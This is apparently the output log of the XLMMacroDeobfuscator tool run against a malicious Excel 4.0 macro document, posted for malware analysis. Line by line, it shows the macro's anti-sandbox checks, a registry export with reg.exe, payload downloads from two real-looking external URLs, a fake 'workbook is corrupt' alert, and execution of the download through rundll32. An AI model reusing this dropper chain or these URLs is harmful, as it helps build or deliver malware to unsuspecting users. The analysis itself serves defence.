dissectmalware

323455169b75e4a753eb5ad34290243ede09f9d559545aac6e6a71c2719b

May 26th, 2020
  1. _ _______
  2. |\ /|( \ ( )
  3. ( \ / )| ( | () () |
  4. \ (_) / | | | || || |
  5. ) _ ( | | | |(_)| |
  6. / ( ) \ | | | | | |
  7. ( / \ )| (____/\| ) ( |
  8. |/ \|(_______/|/ \|
  9. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  10. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  11. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  12. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  13. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  14. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  15. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  16. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  17.  
  18.  
  19. XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  20.  
  21. File: C:\Users\user\Downloads\323455169b75e4a753eb5ad34290243ede09f9d559545aac6e6a71c2719b98de.xls
  22.  
  23. [Loading Cells]
  24. auto_open: auto_open->Sheet2!$FA$7876
  25. [Starting Deobfuscation]
  26. CELL:FA7876 , FullEvaluation , SET.VALUE(BJ25299,255.6)
  27. CELL:FA7877 , FullEvaluation , GOTO(BQ45566)
  28. CELL:BQ45566 , FullEvaluation , SET.VALUE(CD53037,-389)
  29. CELL:BQ45567 , FullEvaluation , RUN(Sheet2!HD64832)
  30. CELL:HD64832 , FullEvaluation , SET.VALUE(FZ5258,65.25)
  31. CELL:HD64833 , FullEvaluation , RUN(Sheet2!ES3436)
  32. CELL:ES3436 , FullEvaluation , SET.VALUE(AE45948,-251)
  33. CELL:ES3437 , FullEvaluation , GOTO(GS20666)
  34. CELL:GS20666 , FullEvaluation , SET.VALUE(CR53465,-199)
  35. CELL:GS20667 , FullEvaluation , GOTO(DF5689)
  36. CELL:DF5689 , FullEvaluation , SET.VALUE(R15778,102.75)
  37. CELL:DF5690 , FullEvaluation , GOTO(DL39613)
  38. CELL:DL39613 , FullEvaluation , SET.VALUE(GM16462,-969.75)
  39. CELL:DL39614 , FullEvaluation , GOTO(HM27262)
  40. CELL:HM27262 , FullEvaluation , SET.VALUE(IN13413,1203.8)
  41. CELL:HM27263 , FullEvaluation , RUN(Sheet2!IJ30961)
  42. CELL:IJ30961 , FullEvaluation , SET.VALUE(DG47804,-494)
  43. CELL:IJ30962 , FullEvaluation , RUN(Sheet2!AL57983)
  44. CELL:AL57983 , FullEvaluation , SET.VALUE(BG47080,35)
  45. CELL:AL57984 , FullEvaluation , GOTO(HN49209)
  46. CELL:HN49209 , FullEvaluation , FORMULA("=CLOSE(FALSE)",FE5114)
  47. CELL:HN49210 , FullEvaluation , RUN(Sheet2!EG28967)
  48. CELL:EG28967 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",EG28968)
  49. CELL:EG28968 , PartialEvaluation , APP.MAXIMIZE()
  50. CELL:EG28969 , FullEvaluation , RUN(Sheet2!DT45019)
  51. CELL:DT45019 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[-39906]C[37]),)",DT45020)
  52. CELL:DT45020 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[-39906]C[37]),)
  53. CELL:DT45021 , FullEvaluation , GOTO(U26012)
  54. CELL:U26012 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-20899]C[140]))",U26013)
  55. CELL:U26013 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-20899]C[140]))
  56. CELL:U26014 , FullEvaluation , RUN(Sheet2!IO19668)
  57. CELL:IO19668 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[-14555]C[-88]),)",IO19669)
  58. CELL:IO19669 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[-14555]C[-88]),)
  59. CELL:IO19670 , FullEvaluation , GOTO(FG59760)
  60. CELL:FG59760 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[-54647]C[-2]),)",FG59761)
  61. CELL:FG59761 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[-54647]C[-2]),)
  62. CELL:FG59762 , FullEvaluation , RUN(Sheet2!HC57286)
  63. CELL:HC57286 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[-52173]C[-50]),)",HC57287)
  64. CELL:HC57287 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R[-52173]C[-50]),)
  65. CELL:HC57288 , FullEvaluation , RUN(Sheet2!FG13805)
  66. CELL:FG13805 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-8692]C[-2]),)",FG13806)
  67. CELL:FG13806 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R[-8692]C[-2]),)
  68. CELL:FG13807 , FullEvaluation , GOTO(HS5509)
  69. CELL:HS5509 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-396]C[-66]))",HS5510)
  70. CELL:HS5510 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-396]C[-66]))
  71. CELL:HS5511 , FullEvaluation , RUN(Sheet2!AQ38016)
  72. CELL:AQ38016 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-32903]C[118]))",AQ38017)
  73. CELL:AQ38017 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-32903]C[118]))
  74. CELL:AQ38018 , FullEvaluation , GOTO(CR63589)
  75. CELL:CR63589 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-58476]C[65]))",CR63590)
  76. CELL:CR63590 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-58476]C[65]))
  77. CELL:CR63590 , FullEvaluation , [TRUE]
  78. CELL:CR63591 , FullEvaluation , RUN(Sheet2!DR7029)
  79. CELL:DR7029 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",FG17853)
  80. CELL:DR7030 , FullEvaluation , GOTO(GU6960)
  81. CELL:GU6960 , FullEvaluation , FORMULA("=""C:\Users\Public\WMNyoI.reg""",AK62260)
  82. CELL:GU6961 , FullEvaluation , RUN(Sheet2!EF33676)
  83. CELL:EF33676 , FullEvaluation , FORMULA("=R[-33458]C[47]&GET.WORKSPACE(2)&""\Excel\Security ""&R[10949]C[-79]&"" /y""",DL51311)
  84. CELL:EF33677 , FullEvaluation , RUN(Sheet2!FX41133)
  85. CELL:FX41133 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",AZ24506)
  86. CELL:FX41134 , FullEvaluation , RUN(Sheet2!HN11697)
  87. CELL:HN11697 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[12808]C[-170],R[39613]C[-106],0,5)",HN11698)
  88. CELL:HN11698 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","=""C:\Windows\system32\reg.exe""","=R[-33458]C[47]&GET.WORKSPACE(2)&""\Excel\Security ""&R[10949]C[-79]&"" /y""",0,5)
  89. CELL:HN11699 , FullEvaluation , GOTO(FZ14642)
  90. CELL:FZ14642 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[47615]C[-145])))",FZ14645)
  91. CELL:FZ14643 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",FZ14646)
  92. CELL:FZ14644 , FullEvaluation , FORMULA("=NEXT()",FZ14647)
  93. CELL:FZ14645 , PartialEvaluation , WHILE(ISERROR(FILES(R[47615]C[-145])))
  94. CELL:FZ14648 , FullEvaluation , GOTO(CA23395)
  95. CELL:CA23395 , FullEvaluation , FORMULA("=FOPEN(R[38864]C[-42])",CA23396)
  96. CELL:CA23396 , PartialEvaluation , FOPEN("=""C:\Users\Public\WMNyoI.reg""")
  97. CELL:CA23397 , FullEvaluation , GOTO(GX30764)
  98. CELL:GX30764 , FullEvaluation , FORMULA("=FPOS(R[-7369]C[-127],215)",GX30765)
  99. CELL:GX30765 , PartialEvaluation , FPOS("FOPEN(""=""""C:\Users\Public\WMNyoI.reg"""""")",215)
  100. CELL:GX30766 , FullEvaluation , RUN(Sheet2!DY20468)
  101. CELL:DY20468 , FullEvaluation , FORMULA("=FREAD(R[2927]C[-50],255)",DY20469)
  102. CELL:DY20469 , PartialEvaluation , FREAD("FOPEN(""=""""C:\Users\Public\WMNyoI.reg"""""")",255)
  103. CELL:DY20470 , FullEvaluation , RUN(Sheet2!EJ44420)
  104. CELL:EJ44420 , FullEvaluation , FORMULA("=FCLOSE(R[-21025]C[-61])",EJ44421)
  105. CELL:EJ44421 , PartialEvaluation , FCLOSE("FOPEN(""=""""C:\Users\Public\WMNyoI.reg"""""")")
  106. CELL:EJ44422 , FullEvaluation , RUN(Sheet2!DE35862)
  107. CELL:DE35862 , FullEvaluation , FORMULA("=FILE.DELETE(R[26397]C[-72])",DE35863)
  108. CELL:DE35863 , PartialEvaluation , FILE.DELETE("=""C:\Users\Public\WMNyoI.reg""")
  109. CELL:DE35864 , FullEvaluation , RUN(Sheet2!EW6206)
  110. CELL:EW6206 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[14262]C[-24])),GOTO(R[-1093]C[8]),)",EW6207)
  111. CELL:EW6207 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[14262]C[-24])),GOTO(R[-1093]C[8]),)
  112. CELL:EW6207 , FullEvaluation , [TRUE] GOTO(R[-1093]C[8])
  113. CELL:FE5114 , End , CLOSE(FALSE)
  114. CELL:EW6207 , FullEvaluation , [FALSE]
  115. CELL:EW6208 , FullEvaluation , RUN(Sheet2!HG37600)
  116. CELL:HG37600 , FullEvaluation , FORMULA("=""C:\Users\Public\CcWcaZEP.html""",AG4058)
  117. CELL:HG37601 , FullEvaluation , GOTO(BG7958)
  118. CELL:BG7958 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",GK20094)
  119. CELL:BG7959 , FullEvaluation , GOTO(FT2763)
  120. CELL:FT2763 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[17330]C[17],R[1294]C[-143],0,0)",FT2764)
  121. CELL:FT2764 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""","=""C:\Users\Public\CcWcaZEP.html""",0,0)
  122. CELL:FT2765 , FullEvaluation , GOTO(GS14934)
  123. CELL:GS14934 , FullEvaluation , FORMULA("=FILES(R[-10877]C[-168])",GS14935)
  124. CELL:GS14935 , PartialEvaluation , FILES("=""C:\Users\Public\CcWcaZEP.html""")
  125. CELL:GS14936 , FullEvaluation , RUN(Sheet2!IB64512)
  126. CELL:IB64512 , FullEvaluation , FORMULA("=IF(ISERROR(R[-49578]C[-35]),GOTO(R[-59399]C[-75]),)",IB64513)
  127. CELL:IB64513 , FullBranching , IF(ISERROR(R[-49578]C[-35]),GOTO(R[-59399]C[-75]),)
  128. CELL:IB64513 , FullEvaluation , [TRUE] GOTO(R[-59399]C[-75])
  129. CELL:FE5114 , End , CLOSE(FALSE)
  130. CELL:IB64513 , FullEvaluation , [FALSE]
  131. CELL:IB64514 , FullEvaluation , GOTO(FW47055)
  132. CELL:FW47055 , FullEvaluation , SET.VALUE(IU65323,-97.5)
  133. CELL:FW47056 , FullEvaluation , GOTO(GT51876)
  134. CELL:GT51876 , FullEvaluation , SET.VALUE(BH45074,247)
  135. CELL:GT51877 , FullEvaluation , GOTO(AY22925)
  136. CELL:AY22925 , FullEvaluation , SET.VALUE(GC44684,329)
  137. CELL:AY22926 , FullEvaluation , RUN(Sheet2!EQ17120)
  138. CELL:EQ17120 , FullEvaluation , SET.VALUE(BZ59600,376)
  139. CELL:EQ17121 , FullEvaluation , RUN(Sheet2!CI60554)
  140. CELL:CI60554 , FullEvaluation , SET.VALUE(IJ21467,-846)
  141. CELL:CI60555 , FullEvaluation , GOTO(CP30159)
  142. CELL:CP30159 , FullEvaluation , SET.VALUE(AP50057,0.9)
  143. CELL:CP30160 , FullEvaluation , GOTO(AD49613)
  144. CELL:AD49613 , FullEvaluation , SET.VALUE(AT21980,-357.6)
  145. CELL:AD49614 , FullEvaluation , RUN(Sheet2!IG12751)
  146. CELL:IG12751 , FullEvaluation , SET.VALUE(EO40560,172)
  147. CELL:IG12752 , FullEvaluation , GOTO(GC38983)
  148. CELL:GC38983 , FullEvaluation , SET.VALUE(BU61267,476)
  149. CELL:GC38984 , FullEvaluation , GOTO(DH39742)
  150. CELL:DH39742 , FullEvaluation , SET.VALUE(HY9156,406)
  151. CELL:DH39743 , FullEvaluation , GOTO(DN42978)
  152. CELL:DN42978 , FullEvaluation , FORMULA("=""C:\Users\Public\kf1o.html""",FP15812)
  153. CELL:DN42979 , FullEvaluation , GOTO(EB3725)
  154. CELL:EB3725 , FullEvaluation , FORMULA("=""https://dehabadi.ir/wp-keys.php""",EN4797)
  155. CELL:EB3726 , FullEvaluation , RUN(Sheet2!AX38305)
  156. CELL:AX38305 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[4751]C[5],R[15766]C[33],0,0)",EI46)
  157. CELL:AX38306 , FullEvaluation , GOTO(BB30)
  158. CELL:BB30 , FullEvaluation , FORMULA("=FILES(R[-34907]C[50])",DR50719)
  159. CELL:BB31 , FullEvaluation , GOTO(CN53095)
  160. CELL:CN53095 , FullEvaluation , FORMULA("=IF(ISERROR(R[16690]C[104]),,RUN(R[-31106]C[26]))",R34029)
  161. CELL:CN53096 , FullEvaluation , GOTO(HD9075)
  162. CELL:HD9075 , FullEvaluation , FORMULA("=""https://eleventalents.com/wp-keys.php""",AB61478)
  163. CELL:HD9076 , FullEvaluation , RUN(Sheet2!GE52633)
  164. CELL:GE52633 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[8035]C[-199],R[-37631]C[-55],0,0)",HS53443)
  165. CELL:GE52634 , FullEvaluation , RUN(Sheet2!E6760)
  166. CELL:E6760 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",DD49036)
  167. CELL:E6761 , FullEvaluation , GOTO(DK19379)
  168. CELL:DK19379 , FullEvaluation , FORMULA("=ALERT(R[46113]C[64])",AR2923)
  169. CELL:DK19380 , FullEvaluation , RUN(Sheet2!GR22181)
  170. CELL:GR22181 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",DU54329)
  171. CELL:GR22182 , FullEvaluation , GOTO(GZ25335)
  172. CELL:GZ25335 , FullEvaluation , FORMULA("=R[-29869]C[-79]&"",DllRegisterServer""",IQ45681)
  173. CELL:GZ25336 , FullEvaluation , GOTO(AI4480)
  174. CELL:AI4480 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[50025]C[-13],R[41377]C[113],0,5)",EH4304)
  175. CELL:AI4481 , FullEvaluation , GOTO(EI46)
  176. CELL:EI46 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"=""https://dehabadi.ir/wp-keys.php""","=""C:\Users\Public\kf1o.html""",0,0)
  177. CELL:EI47 , FullEvaluation , RUN(Sheet2!DR50719)
  178. CELL:DR50719 , PartialEvaluation , FILES("=""C:\Users\Public\kf1o.html""")
  179. CELL:DR50720 , FullEvaluation , GOTO(R34029)
  180. CELL:R34029 , FullBranching , IF(ISERROR(R[16690]C[104]),,RUN(R[-31106]C[26]))
  181. CELL:R34029 , FullEvaluation , [TRUE]
  182. CELL:R34030 , FullEvaluation , GOTO(AB61478)
  183. CELL:AB61478 , FullEvaluation , "https://eleventalents.com/wp-keys.php"
  184. CELL:AB61479 , FullEvaluation , RUN(Sheet2!HS53443)
  185. CELL:HS53443 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://eleventalents.com/wp-keys.php","=""C:\Users\Public\kf1o.html""",0,0)
  186. CELL:HS53444 , FullEvaluation , RUN(Sheet2!DD49036)
  187. CELL:DD49036 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  188. CELL:DD49037 , FullEvaluation , GOTO(AR2923)
  189. CELL:AR2923 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  190. CELL:AR2924 , FullEvaluation , GOTO(DU54329)
  191. CELL:DU54329 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  192. CELL:DU54330 , FullEvaluation , GOTO(IQ45681)
  193. CELL:IQ45681 , FullEvaluation , "=""C:\Users\Public\kf1o.html"",DllRegisterServer"
  194. CELL:IQ45682 , FullEvaluation , GOTO(EH4304)
  195. CELL:EH4304 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","=""C:\Users\Public\kf1o.html"",DllRegisterServer",0,5)
  196. CELL:EH4305 , FullEvaluation , GOTO(FE5114)
  197. CELL:FE5114 , End , CLOSE(FALSE)
  198. CELL:R34029 , FullEvaluation , [FALSE] RUN(Sheet2!AR2923)
  199. CELL:AR2923 , PartialEvaluation , ALERT("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
  200. CELL:AR2924 , FullEvaluation , GOTO(DU54329)
  201. CELL:DU54329 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  202. CELL:DU54330 , FullEvaluation , GOTO(IQ45681)
  203. CELL:IQ45681 , FullEvaluation , "=""C:\Users\Public\kf1o.html"",DllRegisterServer"
  204. CELL:IQ45682 , FullEvaluation , GOTO(EH4304)
  205. CELL:EH4304 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","=""C:\Users\Public\kf1o.html"",DllRegisterServer",0,5)
  206. CELL:EH4305 , FullEvaluation , GOTO(FE5114)
  207. CELL:FE5114 , End , CLOSE(FALSE)
  208. CELL:CR63590 , FullEvaluation , [FALSE] GOTO(R[-58476]C[65])
  209. CELL:FE5114 , End , CLOSE(FALSE)
  210. [END of Deobfuscation]
  211. time elapsed: 9.589247465133667